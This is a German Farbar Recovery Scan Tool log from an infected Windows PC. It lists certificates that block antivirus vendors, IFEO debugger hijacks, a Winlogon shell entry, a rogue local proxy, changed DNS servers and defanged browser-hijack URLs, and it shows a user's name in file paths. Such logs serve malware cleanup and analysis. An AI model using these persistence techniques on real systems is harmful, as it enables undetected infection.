HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (U)
HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (U)
HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ACHTUNG
HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (U)
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ACHTUNG
HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== ACHTUNG
HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ACHTUNG
HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (U)
HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (U)
HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ACHTUNG
HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== ACHTUNG
HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ACHTUNG
HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (U)
HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ACHTUNG
HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== ACHTUNG
HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ACHTUNG
HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== ACHTUNG
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ACHTUNG
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\RunOnce: [windows] => C:\ProgramData\windows\windows.exe [1052256 2017-01-03] ()
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\MountPoints2: {3b90a8ba-330f-11e7-83e4-0071c2420bd3} - "F:\autorun.exe" 
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\MountPoints2: {e8e722cc-412b-11e7-840b-0071c2420bd3} - "F:\OriginInstaller.exe" 
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\Winlogon: [Shell] explorer.exe,"C:\Users\Nick Schuster\AppData\Roaming\avv.exe" <==== ACHTUNG
HKU\S-1-5-18\...\Run: [sG4nE4Ad85qJ.exe] => C:\ProgramData\e9cf343f516c47a4a7255147ad1dcd13\sG4nE4Ad85qJ.exe [216576 2017-05-30] ()
HKLM\...\Providers\6ddy6fjk: C:\Program Files (x86)\Qizsywosale Core\local64spl.dll [306688 2017-03-17] ()
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
IFEO\rstrui.exe: [Debugger] rrtuy.exe
ShellExecuteHooks: Kein Name - {5EBD559E-A5BA-11E6-B9FD-64006A5CFC23} - C:\Users\Nick Schuster\AppData\Roaming\Phucusy\Pipothzo.dll -> Keine Datei
ShellExecuteHooks: Kein Name - {9C829CE8-039A-11E7-8F7F-64006A5CFC23} - C:\Users\Nick Schuster\AppData\Roaming\Anerpe\Zoduly.dll -> Keine Datei
ShellExecuteHooks: Kein Name - {234628B4-4048-11E7-9F2C-64006A5CFC23} - C:\Users\Nick Schuster\AppData\Roaming\Grerdaentlerveck\Thuvale.dll -> Keine Datei
ShellExecuteHooks: Kein Name - {A4CD8824-4049-11E7-9F11-64006A5CFC23} - C:\Users\Default\AppData\Roaming\Minerent\Wuteghtplejipy.dll [144896 2017-05-30] ()
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Nick Schuster\AppData\Local\MEGAsync\ShellExtX64.dll -> Keine Datei
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Nick Schuster\AppData\Local\MEGAsync\ShellExtX64.dll -> Keine Datei
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Nick Schuster\AppData\Local\MEGAsync\ShellExtX64.dll -> Keine Datei
ShellIconOverlayIdentifiers: [ DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers: [ DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers: [ DropboxExt3] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers: [ DropboxExt4] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers: [ DropboxExt5] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers: [ DropboxExt6] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers: [ DropboxExt7] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers: [ DropboxExt8] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers: [ DropboxExt9] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Keine Datei
ShellIconOverlayIdentifiers: [KzShlobj] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} =>  -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Nick Schuster\AppData\Local\MEGAsync\ShellExtX32.dll -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Nick Schuster\AppData\Local\MEGAsync\ShellExtX32.dll -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Nick Schuster\AppData\Local\MEGAsync\ShellExtX32.dll -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ DropboxExt3] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ DropboxExt4] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ DropboxExt5] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ DropboxExt6] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ DropboxExt7] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ DropboxExt8] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ DropboxExt9] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll -> Keine Datei
Startup: C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MEGAsync.lnk [2017-06-05]
Startup: C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\smss.exe [2017-06-05] ()
BootExecute: autocheck autochk * sh4native Sh4Removal
GroupPolicy: Beschr鋘kung - Chrome <======= ACHTUNG
CHR HKLM\SOFTWARE\Policies\Google: Beschr鋘kung <======= ACHTUNG

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zur點kgesetzt, wenn es sich um einen Registryeintrag handelt.)

ProxyEnable: [.DEFAULT] => Proxy ist aktiviert.
ProxyServer: [.DEFAULT] => 127.0.0.1:8003
ProxyEnable: [S-1-5-19] => Proxy ist aktiviert.
ProxyServer: [S-1-5-19] => 127.0.0.1:8003
ProxyEnable: [S-1-5-20] => Proxy ist aktiviert.
ProxyServer: [S-1-5-20] => 127.0.0.1:8003
ProxyServer: [S-1-5-21-3847841184-804715454-2304624315-1001] => 127.0.0.1:8003
Hosts: Es ist mehr als ein Eintrag in der Hosts Datei zu finden. Siehe Hosts-Bereich in Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.192.1
Tcpip\Parameters: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{04A2521B-7C11-484A-B28D-E9BE3102A821}: [DhcpNameServer] 82.163.143.176
Tcpip\..\Interfaces\{8EA2322E-EF2C-4423-AF3C-3EE361FD417B}: [DhcpNameServer] 192.168.192.1
Tcpip\..\Interfaces\{9BAF9E4B-D963-4721-8C85-586F3F37FF3C}: [NameServer] 8.8.8.8,8.8.4.4,4.2.2.1,4.2.2.2,208.67.222.222,208.67.220.220,8.26.56.26,8.20.247.20,156.154.70.1,156.154.71.1
Tcpip\..\Interfaces\{9BAF9E4B-D963-4721-8C85-586F3F37FF3C}: [DhcpNameServer] 192.168.192.1
Tcpip\..\Interfaces\{C085ED3F-9016-49ED-8EF6-3F93AD892C71}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{C085ED3F-9016-49ED-8EF6-3F93AD892C71}: [DhcpNameServer] 82.163.143.157
Tcpip\..\Interfaces\{E0DF352E-2385-4F61-8BE1-15E2F9F0520E}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{E0DF352E-2385-4F61-8BE1-15E2F9F0520E}: [DhcpNameServer] 82.163.143.157
ManualProxies: 

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschr鋘kung <======= ACHTUNG
HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschr鋘kung <======= ACHTUNG
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1496220549&z=f72a668514478351723213eg2zet8qfo9ode2w5zae&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1496220549&z=f72a668514478351723213eg2zet8qfo9ode2w5zae&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491385150&z=2a9afdb9de70e14a8bc3025g3z1t6gac5bfwbg8gcw&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491385150&z=2a9afdb9de70e14a8bc3025g3z1t6gac5bfwbg8gcw&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1496220549&z=f72a668514478351723213eg2zet8qfo9ode2w5zae&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1496220549&z=f72a668514478351723213eg2zet8qfo9ode2w5zae&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491385150&z=2a9afdb9de70e14a8bc3025g3z1t6gac5bfwbg8gcw&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491385150&z=2a9afdb9de70e14a8bc3025g3z1t6gac5bfwbg8gcw&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&q={searchTerms}
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.startpageing123.com/search/?type=ds&ts=1490098796&z=edb8deb4a39db277332a2ebg6z4t7e1e3t2bdm2b1z&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&q={searchTerms}
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1496220549&z=f72a668514478351723213eg2zet8qfo9ode2w5zae&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1496220549&z=f72a668514478351723213eg2zet8qfo9ode2w5zae&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://de.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_ir_17_18&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dde%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0FyCtDyCyCzyyE0FyB0EzytCyByD0DtDtN0D0Tzu0StCzyyDtAtN1L2XzutAtFtBzytFtAtFyByDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StCyBtCtBzztByEtCtGyCyB0DtCtG0C0B0DtCtGyE0E0DyCtGtCyEyBzzyD0CzzzytD0CyD0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StC0C0DtD0D0B0CyDtGzyyC0E0FtGyEtDyEyDtG0BzztCzztG0FtBtDyCtDzy0FtCzztDzz0E2QtN0A0LzuyE%26cr%3D1366659074%26a%3Dwbf_ir_17_18%26os_ver%3D6.3%26os%3DWindows%2B8.1&p={searchTerms}
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://de.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_ir_17_18&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dde%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0FyCtDyCyCzyyE0FyB0EzytCyByD0DtDtN0D0Tzu0StCzyyDtAtN1L2XzutAtFtBzytFtAtFyByDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StCyBtCtBzztByEtCtGyCyB0DtCtG0C0B0DtCtGyE0E0DyCtGtCyEyBzzyD0CzzzytD0CyD0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StC0C0DtD0D0B0CyDtGzyyC0E0FtGyEtDyEyDtG0BzztCzztG0FtBtDyCtDzy0FtCzztDzz0E2QtN0A0LzuyE%26cr%3D1366659074%26a%3Dwbf_ir_17_18%26os_ver%3D6.3%26os%3DWindows%2B8.1&p={searchTerms}
SearchScopes: HKLM -> {2211d4a5-48d0-47f5-a7cd-81e861470f7f} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxps://de.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_ir_17_18&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dde%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0FyCtDyCyCzyyE0FyB0EzytCyByD0DtDtN0D0Tzu0StCzyyDtAtN1L2XzutAtFtBzytFtAtFyByDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StCyBtCtBzztByEtCtGyCyB0DtCtG0C0B0DtCtGyE0E0DyCtGtCyEyBzzyD0CzzzytD0CyD0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StC0C0DtD0D0B0CyDtGzyyC0E0FtGyEtDyEyDtG0BzztCzztG0FtBtDyCtDzy0FtCzztDzz0E2QtN0A0LzuyE%26cr%3D1366659074%26a%3Dwbf_ir_17_18%26os_ver%3D6.3%26os%3DWindows%2B8.1&p={searchTerms}
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
SearchScopes: HKLM-x32 -> {2211d4a5-48d0-47f5-a7cd-81e861470f7f} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491385150&z=2a9afdb9de70e14a8bc3025g3z1t6gac5bfwbg8gcw&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&q={searchTerms}
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxps://de.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_ir_17_18&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dde%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0FyCtDyCyCzyyE0FyB0EzytCyByD0DtDtN0D0Tzu0StCzyyDtAtN1L2XzutAtFtBzytFtAtFyByDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StCyBtCtBzztByEtCtGyCyB0DtCtG0C0B0DtCtGyE0E0DyCtGtCyEyBzzyD0CzzzytD0CyD0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StC0C0DtD0D0B0CyDtGzyyC0E0FtGyEtDyEyDtG0BzztCzztG0FtBtDyCtDzy0FtCzztDzz0E2QtN0A0LzuyE%26cr%3D1366659074%26a%3Dwbf_ir_17_18%26os_ver%3D6.3%26os%3DWindows%2B8.1&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3847841184-804715454-2304624315-1001 -> {2211d4a5-48d0-47f5-a7cd-81e861470f7f} URL = 
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll [2016-02-23] (CANON INC.)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_121\bin\ssv.dll [2017-02-13] (Oracle Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_121\bin\jp2ssv.dll [2017-02-13] (Oracle Corporation)
BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll [2016-02-23] (CANON INC.)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\ssv.dll [2017-02-13] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\jp2ssv.dll [2017-02-13] (Oracle Corporation)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll [2016-02-23] (CANON INC.)
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll [2016-02-23] (CANON INC.)
DPF: HKLM-x32 {166B1BCA-3F9C-11CF-8075-444553540000} hxxps://fpdownload.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: HKLM-x32 {233C1507-6A77-46A4-9443-F871F945D258} hxxps://fpdownload.macromedia.com/pub/shockwave/cabs/director/sw.cab

FireFox:
========
FF DefaultProfile: ajsmomju.default
FF DefaultProfile: 5f8d7llm.default
FF ProfilePath: C:\Users\Nick Schuster\AppData\Roaming\Firefox\Firefox\naweriweentcofise\Profiles\5f8d7llm.default\Profiles\5f8d7llm.default [nicht gefunden]
FF ProfilePath: C:\Users\Nick Schuster\AppData\Roaming\Mozilla\Firefox\Profiles\ajsmomju.default [2017-06-01]
FF NewTab: Mozilla\Firefox\Profiles\ajsmomju.default -> hxxp://www.initialsite123.com/?z=f1b5038898decb600b47077g1z9tfqae8b9m2tfz7w&from=icb&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&type=hp
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\ajsmomju.default -> initialsite123
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\ajsmomju.default -> initialsite123
FF Homepage: Mozilla\Firefox\Profiles\ajsmomju.default -> hxxp://www.ourluckysites.com/?type=hp&ts=1496220549&z=f72a668514478351723213eg2zet8qfo9ode2w5zae&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX
FF Keyword.URL: Mozilla\Firefox\Profiles\ajsmomju.default -> user_pref("keyword.URL", true);
FF SearchPlugin: C:\Users\Nick Schuster\AppData\Roaming\Mozilla\Firefox\Profiles\ajsmomju.default\searchplugins\ourluckysites.xml [2017-05-31]
FF ProfilePath: C:\Users\Nick Schuster\AppData\Roaming\Firefox\Firefox\Profiles\5f8d7llm.default [2017-06-05]
FF NewTab: Firefox\Firefox\Profiles\5f8d7llm.default -> hxxp://www.trotux.com/?z=d9e5c212f42caf02cf9f950g4zab0tcmae1g4b0g2e&from=isr&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&type=hp
FF SelectedSearchEngine: Firefox\Firefox\Profiles\5f8d7llm.default -> trotux
FF Extension: (SimilarWeb) - C:\Users\Nick Schuster\AppData\Roaming\Firefox\Firefox\Profiles\5f8d7llm.default\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi [2017-03-28] [ist nicht signiert]
FF Extension: (HSearch) - C:\Users\Nick Schuster\AppData\Roaming\Firefox\Firefox\Profiles\5f8d7llm.default\Extensions\@E97YHOMI-FU8L-IM23-VUT9-RVDZT7M8XL8H.xpi [2017-04-17] [ist nicht signiert]
FF Extension: (FF Adr) - C:\Users\Nick Schuster\AppData\Roaming\Firefox\Firefox\Profiles\5f8d7llm.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-03-28] [ist nicht signiert]
FF Extension: (Deutsch (DE) Language Pack) - C:\Users\Nick Schuster\AppData\Roaming\Firefox\Firefox\Profiles\5f8d7llm.default\Extensions\langpack-de@firefox.mozilla.org.xpi [2017-05-31] [ist nicht signiert]
FF Extension: (Adblock Plus) - C:\Users\Nick Schuster\AppData\Roaming\Firefox\Firefox\Profiles\5f8d7llm.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2017-05-26]
FF SearchPlugin: C:\Users\Nick Schuster\AppData\Roaming\Firefox\Firefox\Profiles\5f8d7llm.default\searchplugins\6ddy6fjk.xml [2017-03-17]
FF SearchPlugin: C:\Users\Nick Schuster\AppData\Roaming\Firefox\Firefox\Profiles\5f8d7llm.default\searchplugins\startpageing123.xml [2017-03-21]
FF SearchPlugin: C:\Users\Nick Schuster\AppData\Roaming\Firefox\Firefox\Profiles\5f8d7llm.default\searchplugins\startsearch.xml [2017-05-31]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_25_0_0_171.dll [2017-05-09] ()
FF Plugin: @java.com/DTPlugin,version=11.121.2 -> C:\Program Files\Java\jre1.8.0_121\bin\dtplugin\npDeployJava1.dll [2017-02-13] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.121.2 -> C:\Program Files\Java\jre1.8.0_121\bin\plugin2\npjp2.dll [2017-02-13] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50906.0\npctrl.dll [2017-03-09] ( Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [Keine Datei]
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_171.dll [2017-05-09] ()
FF Plugin-x32: @java.com/DTPlugin,version=11.121.2 -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\dtplugin\npDeployJava1.dll [2017-02-13] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.121.2 -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\plugin2\npjp2.dll [2017-02-13] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50906.0\npctrl.dll [2017-03-09] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [Keine Datei]
FF Plugin HKU\S-1-5-21-3847841184-804715454-2304624315-1001: ubisoft.com/uplaypc -> C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll [Keine Datei]
StartMenuInternet: FIREFOX.EXE - C:\Program Files\Mozilla Firefox\firefox.exe hxxp://www.ourluckysites.com/?type=sc&ts=1496220549&z=f72a668514478351723213eg2zet8qfo9ode2w5zae&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX

Chrome: 
=======
CHR Profile: C:\Users\Nick Schuster\AppData\Local\Google\Chrome\User Data\Backup-Standard [2017-05-31] <==== ACHTUNG
